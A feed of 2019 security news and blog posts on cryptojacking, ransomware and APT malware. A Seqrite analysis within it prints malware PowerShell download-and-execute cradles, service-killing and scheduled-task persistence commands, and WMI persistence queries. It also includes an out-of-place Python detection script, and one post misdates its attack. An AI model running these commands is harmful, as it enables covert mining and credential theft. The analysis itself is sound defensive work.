The DOUBLEPULSAR backdoor allows attackers to inject and execute malicious code on a target system. It is installed by leveraging ETERNALBLUE, an SMBv1 (Server Message Block 1.0) exploit that could trigger RCE in older versions of Windows (Windows XP to Server 2008 R2).

Every Windows machine running an old, vulnerable version that exposes an SMB service is at risk of compromise. DOUBLEPULSAR and ETERNALBLUE have been available to anyone since the archive of NSA tools was leaked online by the Shadow Brokers hacker group.

Most of the victims are located in China (80%), with the remainder in South Korea, Japan, and Vietnam.

The experts first observed the campaign in January; almost all victims are enterprises (98%).

The attack chain starts with a phishing email carrying an Excel document as an attachment; the document downloads the DoublePulsar backdoor, which is used to deliver the EternalBlue exploit.

Once the backdoor is installed, a PowerShell command allows the malware to connect to the command and control server. The malicious code executes more PowerShell scripts before the cryptocurrency miner is downloaded.

Experts reported that the Beapy malware also uses the popular post-exploitation tool Mimikatz to steal passwords from Windows systems.

Experts at Symantec also discovered an earlier version of Beapy malware that hit a public-facing web server and that was attempting to spread to connected systems.

It was coded in C rather than Python; this version also includes both EternalBlue and Mimikatz. The malicious code also leverages exploits for known vulnerabilities in Apache Struts, Apache Tomcat, and Oracle WebLogic Server.

“In the web server compromise, Beapy also attempted to exploit an Apache Struts vulnerability (CVE-2017-5638). This vulnerability was patched in 2017, but if successfully exploited it can allow for remote code execution.” continues the analysis. “Beapy also tried to exploit known vulnerabilities in Apache Tomcat (CVE-2017-12615) and the Oracle WebLogic Server (CVE-2017-10271). In the case of this web server compromise observed by Symantec, exploit attempts began in early February, with connections to Beapy’s C&C server first observed on March 13. Activity targeting this web server continued until early April.”

Experts observed a spike in Beapy activity in March.

Since the Coinhive cryptocurrency mining service shut down in March, experts have observed a drop in cryptojacking attacks.

Unlike Coinhive, Beapy is a file-based miner that must be installed by attackers on the victims’ machines in order to mine cryptocurrency.

“As well as these factors, file-based coinminers also have a significant advantage over browser-based coinminers because they can mine cryptocurrency faster.” states Symantec, “The Monero cryptocurrency, which is the cryptocurrency most commonly mined during cryptojacking attacks, dropped in value by 90 percent in 2018, so it may make sense that miners that can create more cryptocurrency faster are now more popular with cyber criminals.”


The Beapy campaign was also spotted by other security firms, including Qihoo 360’s research team and Trend Micro.

Pierluigi Paganini

(SecurityAffairs – Beapy miner, hacking)

The post Beapy Cryptojacking campaign leverages EternalBlue exploit to spread appeared first on Security Affairs.

Miners snatching open source tools to strengthen their malevolent power!


Over the last year, Quick Heal Security Labs has observed an increase in the number of mining malware samples. One way to earn cryptocurrency is to mine it, and cryptocurrency miner malware has become a popular attack vector for cybercriminals because of its ease of deployment and instant return on investment. We usually observe such miners delivered to victims with a variety of techniques. Rather than writing their own modules from scratch, attackers can download open source software and slightly modify it.

In this blog post, we discuss a couple of cases where the attack scenario is built on top of such open source tools, and how the trend of abusing open source tools to build new malware helps malware authors.

The trend is observed especially in cryptojacking cases. Although cryptojacking is a direct source of income for cybercriminals, information stolen from victims’ systems can yield additional money. These open source tools are therefore used for various purposes: downloader frameworks, information stealing, crypto-mining, DNS changers, Mirai bots and many more. This helps form a botnet of similar hosts that produces more hashes per second. Such open source tools are readily available on GitHub and similar platforms, and can be classified as exploit frameworks, vulnerability scanners, password stealers, privilege escalators, evaders, etc.

Infection vector:

We received a miner downloader which downloads multiple components of the attack. This script may reach a system through spam mail, malicious URLs, free software bundlers or any other conventional method used by malware. We also suspect that a PowerShell script is the initial culprit. The behaviour of the miner is somewhat recursive, so we could not confirm its initial trace on the system.

Technical Analysis:

Fig. 1 Working of miner

The miner downloader creates a file named ‘xpdown.dat’ which contains the IP addresses of the C2 servers from which it downloads further components.

It then downloads the following files from the domains:


It contains the IP which downloads the CPU Miner (


It contains the following list of processes to kill if they are running on the victim machine:

lsmose.exe, lsmos.exe, conime.exe, lsmosee.exe, 1.exe, lsazs.exe, tasksche.exe, Zationa.exe, csrs.exe, shennong.bat, svshpst.exe, Spoolvs.exe, svchsot.exe, xmrig.exe, srvany.exe, WinSCV.exe, csrswz.exe, csrs.exe, seser.exe, severxxs.exe, mssecsvc.exe, mssecsvr.exe, dsbws.exe

Then malware downloads a text file which contains the information of multiple payloads to be downloaded.


This down.txt contains the following links. The malware then opens TCP port 32381 on the system.

hxxp://              (C:\windows\system\downs.exe)
hxxp://                         (C:\windows\system\cab.exe)
hxxp://                            (C:\windows\inf\msief.exe)
hxxp://                 (C:\windows\debug\item.dat)

Looking at the links in the file, we observed the following.

Downs.exe is a modified version of Microsoft “CACLS” (which displays and modifies access control lists). Ups.rar is downloaded as cab.exe. This component is a downloader for a Windows variant of the Mirai botnet. It also acts as a DNS changer and opens a backdoor on the system. On execution, it performs multiple operations such as modifying the DNS entry on the host to the IP “”, which is geolocated in China; the ISP of the DNS is “Hangzhou Alibaba Advertising Co.,Ltd.”


Fig. 2 Window Server Check


Then it checks whether the compromised machine is a Windows server by calling GetVersionExA. If the machine is a server, it downloads update.txt from the C2 server and drops it at “C:\windows\system\uplist.txt”. The uplist.txt contains the following payloads to be downloaded and executed.

hxxp://                     (C:\windows\system\msinfo.exe)
hxxp://                   (C:\windows\system\my1.bat)

It also downloads npptools.dll, 64npf.sys, npf.sys, nsoak.dat, packet.dll and wpcap.dll. These files are used for network packet processing and are loaded by msinfo.exe during its execution.

Let’s look into these components one by one.


It contains code that is very stealthy and evasive, as it uses several techniques such as “Squiblydoo”, a “download cradle” and WMI event subscription persistence to run malicious content on infected machines.

The WMI script contains multiple PowerShell scripts.

powershell.exe IEX (New-Object system.Net.WebClient).DownloadString(‘hxxp://’)

This text file contains another PowerShell downloader as follows:

powershell.exe IEX (New-Object system.Net.WebClient).DownloadString(‘hxxp://’)

“Up.txt” contains code which collects information about the system OS, physical memory and the list of running processes using WMI classes, and then downloads the PowerShell version of Mimikatz from GitHub.

It then steals credentials from the compromised machine and uploads them to the FTP server IP: using hard-coded FTP credentials.

Fig. 3 Victims Data in FTP Server.


It is basically a Windows version of the Mirai botnet, as much of its code matches the previously leaked Mirai source code. Upon execution with the command-line parameters “-create” “-run”, it checks whether the architecture of the current system is x86, MIPS, ARM, etc. Based on this identification, it checks for its latest update and downloads it if available.

It performs the following tasks as directed by an encrypted file downloaded from the C2 server.

  1. Implements a spreader mechanism using blind SQL injection (SQLi) and brute-force techniques via a cracking library and the hydra tool:
              [Cracker:Telnet] [Cracker:MSSQL] [Cracker:CCTV] [Cracker:MS17010], CrackerWMI, CrackerSSH
  2. Scans various ports such as 80, 8000 and 445 using masscan (a very fast open source port scanner that operates similarly to nmap, the popular port scanning tool).
  3. Disables specific services by invoking the following command:
              C:\Windows\system32\cmd.exe /c taskkill /f /im csrs.exe&sc stop netprofm&sc config netprofm start= disabled&sc stop NlaSvc&sc config NlaSvc start=disabled
  4. Performs a network scan, for which it collects the public/private IP of the system and all associated information such as geolocation. The attacker then spoofs their own IP against the current system IP and scans other devices using masscan.

Through these steps it converts the system into a bot and adds it to the botnet. Its code is developed in C++ and distributed across many source files such as:

Task_Scan.cpp WPD.cpp

It basically targets IoT devices running embedded Linux, so it uses BusyBox (a software suite that provides UNIX utilities, also called the Swiss Army Knife of embedded Linux) to execute remote commands after compromising/cracking those devices in the ways mentioned above.

VBS/BAT Agent For Download Miner:

First, the payload is dropped and executed at the location below on the victim machine.

hxxp://                      ( downloaded at C:\windows\inf\msief.exe)

On execution, it drops a VBS file and a batch file at the location mentioned below and executes the VBS file by invoking wscript.exe, which in turn executes the bat file.


The bat file contains a lot of code which modifies the attributes of some folders/files, kills specific processes, deletes some files, modifies the access control of some folders/files, establishes persistence for multiple payloads via the registry, the task scheduler and WMI event subscription, and also modifies the firewall policy to block ports 445 and 139.


Fig. 4 Part of C3.bat code

There are also two additional payloads downloaded from one of the C2 servers present in xpdown.dat. The first is a disk writer, a DLL file dropped in “C:\Windows\debug”. It executes on system start because the above bat file adds a task scheduler entry for it:

schtasks /create /tn "Mysa1" /tr "rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa" /ru "system" /sc onstart /F

The second is the final payload, i.e. the XMRig Monero miner, a 64-bit executable downloaded from hxxp:// to “C:\windows\debug\lsmos.exe”.

On execution, it unpacks itself and drops three files in the current execution folder: an executable (lsmose.exe, 64-bit, packed with VMProtect) and two DLLs (xmrstak_cuda_backend.dll and xmrstak_opencl_backend.dll) that the miner needs to run.

In another similar case we observed a Base64-encoded PowerShell script: a cryptomining malware that hides in a WMI class to evade AV and most security products, a stealthy and unusual feature.

After decoding we get the following code:

Fig. 5 Base64 Decoded script


Following is the basic workflow of the malware.

Fig. 6 Basic workflow of miner with WMI class

On execution, it checks whether the IP/domain mentioned in the code is alive. If it is, it requests a banner and receives the response ‘SCM Event1 Log’.

Fig. 7 Request for “banner” and another PowerShell Payload

After that, the malware queries the ‘FilterToConsumerBinding’ WMI class by executing the command below

$a=([string](Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding))

and then checks whether the result contains ‘SCM Event1 Log’. If it is not present, the malware downloads and executes in6.ps1 (64-bit) or in3.ps1 (32-bit) via Invoke-Expression (IEX).


Fig. 8 Request for powershell script


These scripts consist of two parts: the first is a Base64-encoded gzip data stream and the second contains obfuscated code. After de-obfuscation, the code resembles the initial Base64-encoded script with additional features.

Fig 9 decoded in6.ps1

The encoded gzip contains four files as mentioned below:

  1. ‘mini’ – Mimikatz, a credential stealer
  2. ‘mon’ – Monero CPU miner
  3. ‘funs’ – A collection of functions, including one to execute a remote DLL via WMI and an EternalBlue vulnerability scanner
  4. ‘sc’ – Shellcode to execute on other systems and download the same payload if they are vulnerable to EternalBlue

It creates a WMI Class “systemcore_Updater0” under the Namespace “root\default” and adds properties like mimi, mon, funs, sc, ipsu and i17.

Fig 10 Properties of WMI Class “systemcoreUpdater0”

Then it sets the filtername=”SCM Event1 Log Filter” and consumername=”SCM Event1 Log Consumer”

When an attacker uses WMI as a persistence mechanism, instances of __EventFilter, __EventConsumer and __FilterToConsumerBinding have to be created, and an __InstanceCreationEvent is fired for each of them.

In this case, the attacker uses the following query as the EventFilter and binds it to the initial base64-encoded script, which will then be executed approximately every 3 hours.

SELECT * FROM __InstanceModificationEvent WITHIN 10600 WHERE TargetInstance ISA Win32_PerfFormattedData_PerfOS_System

Fig 11 Initial PS script hidden in WMI Class
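As an added illustration from the defender's side (my code, not Seqrite's), the script below triages exported filter/consumer bindings for the traits described above: a timer-style __InstanceModificationEvent filter, a command-executing consumer, an encoded PowerShell payload, and names that imitate the built-in “SCM Event Log” subscription. The sample records, the c2.invalid host and the decoded one-liner are constructed for the example.

```python
import base64
import re

# Default subscription that ships in root\subscription on Windows; the malware's
# "SCM Event1 Log Filter"/"SCM Event1 Log Consumer" names imitate it.
BUILTIN_NAMES = {"SCM Event Log Filter", "SCM Event Log Consumer"}
# Consumer classes that run a command or script when their filter fires.
EXEC_CONSUMERS = {"CommandLineEventConsumer", "ActiveScriptEventConsumer"}
# -EncodedCommand and the abbreviations PowerShell accepts, followed by base64.
ENC_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
SUSPICIOUS_PS = ("iex", "invoke-expression", "downloadstring", "net.webclient", "frombase64string")

# Constructed sample modelled on the write-up, not a real artefact: the decoded
# one-liner points at a placeholder host (.invalid is reserved for that purpose).
DECODED_SAMPLE = "IEX (New-Object Net.WebClient).DownloadString('http://c2.invalid/in6.ps1')"
ENCODED_SAMPLE = base64.b64encode(DECODED_SAMPLE.encode("utf-16le")).decode("ascii")

# Constructed export shaped like the objects Get-WMIObject returns from
# __EventFilter, __EventConsumer and __FilterToConsumerBinding, joined per binding.
SAMPLE_BINDINGS = [
    {   # the genuine Windows default
        "filter_name": "SCM Event Log Filter",
        "query": "select * from MSFT_SCMEventLogEvent",
        "consumer_name": "SCM Event Log Consumer",
        "consumer_class": "NTEventLogEventConsumer",
        "command": "",
    },
    {   # look-alike persistence of the kind described above
        "filter_name": "SCM Event1 Log Filter",
        "query": "SELECT * FROM __InstanceModificationEvent WITHIN 10600 "
                 "WHERE TargetInstance ISA Win32_PerfFormattedData_PerfOS_System",
        "consumer_name": "SCM Event1 Log Consumer",
        "consumer_class": "CommandLineEventConsumer",
        "command": "powershell.exe -NoP -W Hidden -EncodedCommand " + ENCODED_SAMPLE,
    },
]


def decode_encoded_command(command):
    """Plaintext of a PowerShell -EncodedCommand argument (base64 over UTF-16LE), or None."""
    m = ENC_RE.search(command)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def assess_binding(rec):
    """Return the reasons a filter/consumer binding looks like persistence (empty if none)."""
    reasons = []
    q = rec["query"].lower()
    if "__instancemodificationevent" in q and "within" in q and "win32_perfformatteddata" in q:
        reasons.append("timer-style filter: polls a perf-counter class with WITHIN")
    if rec["consumer_class"] in EXEC_CONSUMERS:
        reasons.append(rec["consumer_class"] + " runs a command/script when the filter fires")
    cmd = rec.get("command", "")
    text = ENC_RE.sub(" ", cmd).lower()        # drop the base64 blob before keyword matching
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        reasons.append("PowerShell -EncodedCommand payload")
        text += " " + decoded.lower()
    hits = [k for k in SUSPICIOUS_PS if k in text]
    if hits:
        reasons.append("download/execute primitives: " + ", ".join(hits))
    for name in (rec["filter_name"], rec["consumer_name"]):
        if name.lower().startswith("scm event") and name not in BUILTIN_NAMES:
            reasons.append("name '%s' imitates the built-in SCM Event Log subscription" % name)
    return reasons


def triage(bindings):
    """Map filter name -> findings for every binding that has at least one finding."""
    return {b["filter_name"]: f for b in bindings if (f := assess_binding(b))}


if __name__ == "__main__":
    for name, findings in triage(SAMPLE_BINDINGS).items():
        print(name)
        for f in findings:
            print("  -", f)
```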

It also tries to delete the task scheduler entry “sysupdater0” and checks for “sysupdater0.bat” in %systemroot%; if the file exists, it removes that as well.

It modifies the Windows sleep, hibernate and power plan settings by invoking the following commands:
powercfg /CHANGE -standby-timeout-ac 0
powercfg /CHANGE -hibernate-timeout-ac 0
powercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 000

It removes every object in the __FilterToConsumerBinding class under the namespace “root\subscription” whose filter name does not match “SCM Event0 Log”.

It then kills any process that has an “ESTABLISHED” connection on port 3333, 5555 or 7777.

It makes a list of the PIDs of running “PowerShell” processes and of the system’s network connections. It then checks for processes with an “ESTABLISHED” connection on port 80, 14444, 14433 or 443. If no such process exists and fewer than 8 PowerShell processes are running, it executes the Monero miner using the “funs” module. After that it executes Mimikatz and dumps credentials, regardless of whether the Monero miner was started.

It also enumerates the network addresses, checks which IPs are active and adds them to the property named ‘ipsu’. It then scans those IPs to identify systems vulnerable to MS17-010 (with the EternalBlue scanner script), stores them in the property ‘i17’ and finally executes shellcode that downloads ze3.ps1 or ze6.ps1 (identical to in3.ps1 or in6.ps1) depending on the OS architecture.

Fig 12 Shell code executed by invoking “WinExec”

The shellcode downloads and executes the PS script to infect other vulnerable systems. This is how it spreads to, and mines on, other systems on the network.

So in both cases, open source tools are abused heavily to perform the attack. Mimikatz, masscan and the EternalBlue vulnerability scanner seem to be popular tools among malware authors. Similar techniques are being used to spread ransomware too. Seqrite successfully detects such attacks at various detection levels.

Indicator of Compromise:



Subject Matter Expert:

Priyanka Shinde, Goutam Tripathy, Vallabh Chole
Security Labs, Quick Heal Technologies, Ltd.

The post Miners snatching open source tools to strengthen their malevolent power! appeared first on Seqrite Blog.

Special-Purpose Vehicle Maker Aebi Schmidt Hit by Malware

The special-purpose vehicle maker Aebi Schmidt was hit by a malware attack that disrupted some of its operations.

The Aebi Schmidt Group is a manufacturer of product systems and services for the management, cleaning and clearance of traffic areas as well as for the maintenance of green areas in demanding terrain.

Aebi Schmidt focuses on manufacturing agricultural, municipal and other special-purpose vehicles, including snow blowers, street cleaners, and other machinery used in airports.

On Thursday Aebi Schmidt announced that its systems had been hit by a malware-based cyberattack. The incident caused the disruption of some of its operations, such as email management.

The malware only infected Windows systems; in response to the incident the company temporarily switched off those systems.

“The IT system failure is due to an attempt by third parties to infiltrate malware into our systems. More and more companies worldwide are being affected by such attacks.” reads a note published by the company on its website.


The company notified customers and business partners of the incident and asked them to contact it by phone until its email systems are restored.

Fortunately, the cyber attack has not impacted production systems, order processing, US-based M-B Companies, or its telematics platform.

Windows systems are currently being “rebooted step by step,” but the process could be “time consuming.”

Aebi Schmidt did not share technical details of the cyber attack, but according to TechCrunch, the company was hit by ransomware.

“Aebi Schmidt, a European manufacturing giant with operations in the U.S., has been hit by a ransomware attack, TechCrunch has learned.” reads the post published by TechCrunch. “Schiess [spokesperson Thomas Schiess] would not comment on claims of ransomware specifically, but the source said staff were told during an all-hands meeting Wednesday that the incident was a ‘ransomware attack.’”

Recently another major European company was hit by ransomware, the aluminum giant Norsk Hydro suffered an extensive cyber attack that impacted operations in several of the company’s business areas across Europe and the U.S. The company estimated more than $40 million losses in the first week following the ransomware attack that disrupted its operations.

Pierluigi Paganini

(SecurityAffairs – Aebi Schmidt, ransomware)

The post Special-Purpose Vehicle Maker Aebi Schmidt Hit by Malware appeared first on Security Affairs.

JasperLoader Emerges, Targets Italy with Gootkit Banking Trojan

Nick Biasini and Edmund Brumaghin authored this blog post with contributions from Andrew Williams.

Introduction to JasperLoader

Malware loaders are playing an increasingly important role in malware distribution. They give adversaries the ability to gain an initial foothold on a system and are typically used to deliver various malware payloads following successful compromise. These attacks are popping up more frequently, as we covered in July with Smoke Loader and Brushaloader earlier this year. Loaders allow attackers to decide which malware to drop based on how they feel they can best monetize the access they gained. While malware loaders are commonly seen with email-based threats, they have also been prevalent within the exploit kit landscape for years. Recently, Cisco Talos observed an increase in loader activity being used to deliver a range of malware to systems located in various European countries.

Specifically, we’re tracking a loader known as “JasperLoader,” which has been increasingly active over the past few months and is currently being distributed via malicious spam campaigns primarily targeting central European countries with a particular focus on Germany and Italy. JasperLoader employs a multi-stage infection process that features several obfuscation techniques that make analysis more difficult. It appears that this loader was designed with resiliency and flexibility in mind, as evidenced in later stages of the infection process.

Over the past several months, we’ve seen several spam campaigns with signed emails attempting to infect victims with JasperLoader and ultimately the Gootkit banking trojan. Message signing makes use of certificate verification to confirm the authenticity of the person sending the email, as only those with access to the private key should be able to sign the message. Message signing is not the same as message encryption: it is used only to validate the identity of the sender, not to guarantee the confidentiality of the message itself. Talos has identified several malicious campaigns making use of this type of message signing as a way to lend credibility to their messages and maximize the likelihood that potential victims will open the malicious attachments.


Smashing Security #125: Pick of the thief!

WannaCry's "accidental hero" pleads guilty to malware charges, Samsung and Nokia have fingerprint fumbles, the NCSC publishes a list of 100,000 dreadful passwords, and Apple finds itself at the centre of an identity mix-up. All this and much more is discussed in the latest edition of the award-winning "Smashing Security" podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by John Hawes.

Static Malware Analysis Vs. Dynamic Malware Analysis

Malware Analysis: An Introduction

Cybercriminals are becoming more sophisticated and innovative, new and advanced varieties of malware keep appearing, and malware detection is turning out to be a real challenge. Malware analysis, which involves analyzing the origin, the functionality and the potential impact of a malware sample, is of key importance to cybersecurity in the modern world.

Security professionals rely on malware analysis for various purposes. They may use it to assess the extent of an infection after a malware strike, or to identify the nature of the malware involved. Similarly, a proper understanding of the functionality and impact of a malware sample helps them tackle cyberattacks more effectively.

There are two different kinds of malware analysis, namely static malware analysis and dynamic malware analysis.

Static malware analysis

Static malware analysis involves examining a given malware sample without actually running or executing the code. This is usually done by determining the signature of the malware binary; the signature is a unique identification for the binary file. Calculating the cryptographic hash of the binary file and understanding each of its components helps determine its signature. The executable of the malware binary file is loaded into a disassembler (for example, IDA), which converts the machine-executable code to assembly language. Reverse-engineering the binary in this way makes it easier for a person to read and understand. By looking at the assembly language code, the analyst gets to understand the malware better and can form a clearer idea of the functionality it is programmed to perform and of the potential impact it can have on a system and network. Analysts use different techniques for static analysis; these include file fingerprinting, virus scanning, memory dumping, packer detection, and debugging.

Dynamic malware analysis

Dynamic malware analysis, unlike static malware analysis, involves analyzing the code while running it in a controlled environment. The malware is run in a closed, isolated virtual environment and its behavior is then studied. The intention is to understand its functioning and behavior and to use this knowledge to stop its spread or to remove the infection. In advanced dynamic malware analysis, debuggers are used to determine the functionality of the malware executable. Dynamic malware analysis, unlike static analysis, is behavior-based, and hence analysts won’t miss important behaviors of a malware strain.

Static Vs. Dynamic Malware Analysis: The differences

Let’s try and list out the basic differences between the two different kinds of malware analysis…

  • While static malware analysis is signature based, dynamic analysis is behavior-based.
  • While the code is not executed during static analysis, in dynamic analysis the malware code is run in a sandbox environment.
  • Static analysis is relatively simple: it inspects the malware without running it and attempts to infer its capabilities. Dynamic analysis performs a more thorough analysis of the actions, the functionality and the impact of the malware, with the analyst studying it at each phase of its deployment and operation.
  • While static analysis works for the common malware, dynamic analysis, being behavior-based, is needed for the more sophisticated and advanced kind of malware.

The conclusion

Malware analysis is of utmost importance since it helps us understand malware infections and stop malware from spreading to other systems, files, directories, etc. Malware analysis, static as well as dynamic, helps us understand malware and how it works, and also helps us prevent further attacks very effectively.


The post Static Malware Analysis Vs. Dynamic Malware Analysis appeared first on .

Global Threat Statistics for the week of April 5, 2019

Cryptojacking Boosts Botnet Expansion

Botnets have been essential tools in distributed denial of service attacks for many years. With the continued success of DDoS attacks, it was only a matter of time before botnets were used for other malicious activities. In the past year, we’ve seen botnets used for generating spam and phishing emails, DNS attacks, pay-per-click abuse, ransomware, and cryptojacking.

Cryptojacking, in particular, has seen a significant increase. BleepingComputer just reported on a cryptojacking botnet that is actively attacking Asian targets. The same cryptojacking campaign was detected attacking Chinese targets back in January. Among other attempts to compromise its targets, the attack deploys a malicious XMRig Monero crypto miner.

These botnets can be massive. The Necurs botnet is comprised of 570,000 hosts (more specifically, unique bot IDs) according to Century Link’s Black Lotus Labs. Among them, India leads the pack, hosting nearly one in five Necurs bots.

The statistics that follow are based on an analysis of over 100 million endpoints by Comodo Threat Intelligence Lab for the week of April 5, 2019. In addition to botnets, it includes statistics on malware and phishing.

Countries and Regions Hosting Malware and Botnets

countries which host

With active botnets like Necurs and others targeting computers in India and China, it is understandable that those two countries account for one-third of all botnets, with India at 21% and China at 11%. There are a number of variables that impact where malware and botnets may be hosted, such as availability of target computers, ease of access, the vulnerability of accessible computers, and type of malware. These are constantly changing, so it introduces a bit of randomness to the results, making the statistics that follow a snapshot in time.

Egypt, Iran, Vietnam, and Turkey account for 5% each. Russia follows at 4%, with Brazil and the United States close behind at 3%.
india ranked

Within India, Maharashtra hosted 19% of botnets, followed by Tamil Nadu at 12%, National Capital Territory of Delhi at 10%, Gujarat 8%, and Uttar Pradesh, West Bengal, Telangana, and Karnataka at 6% each. Ten other regions each shared a small percentage of the remaining botnet hosts.
china ranked
Within China, Guangdong hosted just over a quarter of botnets. Zhejiang and Jiangsu each hosted 6%. Beijing and Fujian each hosted 6%. Twenty-one other territories each hosted less than 5%.
which country hosts

The United States hosted just over half of the world’s malware, down considerably from 63% in our last report. In the same time period, Germany jumped from 3% to 9%. Russia, Netherlands, and Italy follow with 6%, 5%, and 4%, respectively. France, India, and the United Kingdom are at 3% each, with all other countries listed each hosting 2% or less.
United states of america
Within the United States, the west coast hosted just over half of the world’s malware, with Washington at 34%, California at 13%, and Oregon at 4%. Washington had a significant drop since our last report, from 79% to 34%. California more than doubled, from 6% to 13%.

Arizona joins the list at 12%. Texas follows at 7%. Also joining the list is Illinois at 5%, Colorado and Pennsylvania, both at 4%, and Utah and Virginia, both at 3%.
Top brands co-opted

One of the most successful phishing methods is to co-opt a well-respected brand, so it is no surprise that impersonating Apple and Microsoft occurs in one-third of website co-opt attempts. The goal of a phishing attack using these brands is to access your computer or device. The phishing usually comes in the form of a pretext of Apple or Microsoft technical support claiming they will fix some horrible (but somehow symptomless) problem you have. The goal is to have the user give them remote access to “fix” the laptop. Once the access is granted, they install malware that will typically include a keystroke logger and other tools to send them useful information from the device.

Half of the brands on the list are financial institutions. These are popular for the same reason as their brick-and-mortar peers – that’s where the money is. Facebook, LinkedIn, Yahoo, and GoDaddy are phishing targets for account takeover. Taking over a GoDaddy account may give a cybercriminal full control of a website from which to launch phishing attacks. Impersonation is the goal of taking over a Facebook, LinkedIn, or Yahoo account. The cybercriminal lures your contacts or connections by pretending to be someone they trust: you.

The scale at which these attacks are being deployed is evident in the number of web pages using this type of attack. This analysis discovered 210,560 web pages impersonating these brands for the purpose of phishing, considerably more than the 61,767 in our last report. Most of those have since been taken down but over 50,000 malicious web pages are still up and running to lure your users.

Sharing this information is important so that your users know to be more vigilant if they get an email or alert, supposedly from Apple, Microsoft, or the others in this chart. Some of these phishing websites look quite authentic and may fool even security-minded users. This type of information is a great addition to your security awareness program.

The post Global Threat Statistics for the week of April 5, 2019 appeared first on .

Stuart City is the new victim of the Ryuk Ransomware

Another city has fallen victim to a malware attack: systems at the city of Stuart, Fla., were infected by the Ryuk ransomware on April 13, 2018.

Law enforcement is investigating a ransomware attack that hit the City of Stuart on April 13, 2018. The Ryuk malware infected several servers and forced them offline.

“City officials on Wednesday confirmed a computer virus that infected servers over the weekend was the result of a ransomware attack.” reported the website TCPalm.

“The virus detected Saturday froze up the city’s servers and they are still offline, said Stuart City manager David Dyess.”

According to officials, the ransomware attack targeting the city of Stuart started with a phishing email; the infection was discovered by an IT employee who was setting up a new server.

City manager David Dyess confirmed that the city systems were infected with a strain of the Ryuk ransomware, but he did not disclose the Bitcoin ransom demanded by crooks.

“They discovered we had two things going on: We had what’s called a trickbot, which is basically a malware type of regular virus which can lead to other more serious issues,” Dyess said. “We also had the Ryuk virus that is an encryptor virus, where it encrypts your files and specifically likes to target your servers.”


At the time of writing, Dyess confirmed that experts are still investigating to determine how the attackers managed to infect the systems.

IT staff at Stuart city have restored servers, payroll, utilities and budgeting; only the city employees’ email accounts are still inaccessible.

Stuart’s police and fire departments are still offline; Dyess believes that overall services should be fully restored within the next week.

In early March, another city was hit by the same ransomware: computers of Jackson County, Georgia, were infected with Ryuk, which paralyzed government activity until officials decided to pay a $400,000 ransom to decrypt the files.

Unlike Jackson County, Stuart City refused to pay the ransom.

“We are not negotiating with them. We are in the process of trying to rebuild our systems,” Dyess said. “We also began scanning every server in the city and every (personal computer) and every laptop in every department to eliminate any viruses on those outer machines.”

Dyess confirmed that the impact was limited thanks to the availability of the city’s backup system.

“If we wouldn’t have had these viable backups, we would probably be in a situation where we had to move into negotiations,” he said. “But with those backups in place, why would we negotiate?”

The Ryuk ransomware appears connected to Hermes malware that was associated with the notorious Lazarus APT group.

The same ransomware was recently used in an attack that affected the newspaper distribution for large major newspapers, including the Wall Street Journal, the New York Times, and the Los Angeles Times.

Further investigation on the malware allowed experts from the security firms FireEye and CrowdStrike to discover that the threat actors behind the Ryuk ransomware are working with another cybercrime gang to gain access to target networks. They are collaborating with the threat actors behind TrickBot, a malware that, once it has infected a system, creates a reverse shell back to the attackers, allowing them to break into the network.

Experts at CrowdStrike believe the Ryuk ransomware is operated by a crime gang they track as GRIM SPIDER, in particular by its Russia-based cell dubbed WIZARD SPIDER, which is behind TrickBot.

Experts pointed out that Hermes was available for sale in the online underground community; attackers could have purchased it to create their own version of Ryuk.

Pierluigi Paganini

(SecurityAffairs – Ryuk ransomware, Stuart city)

The post Stuart City is the new victim of the Ryuk Ransomware appeared first on Security Affairs.

OilRig APT uses Karkoff malware along with DNSpionage in recent attacks

Iran-linked OilRig cyberespionage group is using the reconnaissance malware Karkoff along with DNSpionage in recent campaigns.

The OilRig APT group, the threat actor behind the DNSpionage malware campaign, is carrying out a new sophisticated and targeted operation that infects victims with a new variant of the dreaded malware.

DNSpionage is a custom RAT that uses HTTP and DNS communication to connect with the C&C server.

Threat actors distributed the malware through compromised websites and weaponized documents.

“In February, we discovered some changes to the actors’ tactics, techniques and procedures (TTPs), including the use of a new reconnaissance phase that selectively chooses which targets to infect with malware.” reads the analysis published by Talos. “In April 2019, we also discovered the actors using a new malware, which we are calling ‘Karkoff.’”

DNSpionage decoy doc

According to the Cisco Talos threat research team, the attackers are leveraging new tactics, techniques, and procedures to improve the efficacy of their operations.

Unlike in previous attacks, the group is now using a new malware, tracked as Karkoff, for reconnaissance purposes. Karkoff is used by the hackers to surgically select a target and remain under the radar; it allows them to gather system information related to the workstation environment, operating system, domain, and list of running processes on the victims’ machine.

Karkoff is developed in .NET and also allows attackers to remotely execute arbitrary code on compromised hosts.

The experts linked the DNSpionage and Karkoff malware after observing overlaps in their C2 infrastructure.

Experts noticed that the malware searches for two specific anti-virus solutions, Avira and Avast. If one of them is installed on the target system, a specific flag will be set, and some options from the configuration file will be ignored.

Researchers at Talos noticed that the Karkoff malware generates a log file on the compromised machine which records every command it has executed, together with when it ran.

“From an incident response point of view, it’s interesting to note that the malware generates a log file: C:\Windows\Temp\MSEx_log.txt. The executed commands are stored in this file (xored with ‘M’) with a timestamp.” continues the experts. “This log file can be easily used to create a timeline of the command execution which can be extremely useful when responding to this type of threat. With this in mind, an organisation compromised with this malware would have the opportunity to review the log file and identify the commands carried out against them.”

Attackers behind the DNSpionage campaigns continue to be focused on entities in the Middle Eastern region, including Lebanon and the United Arab Emirates (UAE).

“The threat actor’s ongoing development of DNSpionage malware shows that the attacker continues to find new ways to avoid detection. DNS tunneling is a popular method of exfiltration for some actors and recent examples of DNSpionage show that we must ensure DNS is monitored as closely as an organization’s normal proxy or weblogs.” concludes Talos. “The discovery of Karkoff also shows the actor is pivoting and is increasingly attempting to avoid detection while remaining very focused on the Middle Eastern region.”

Pierluigi Paganini

(SecurityAffairs – hacking, DNSpionage)

The post OilRig APT uses Karkoff malware along with DNSpionage in recent attacks appeared first on Security Affairs.

FireEye experts found source code for CARBANAK malware on VirusTotal

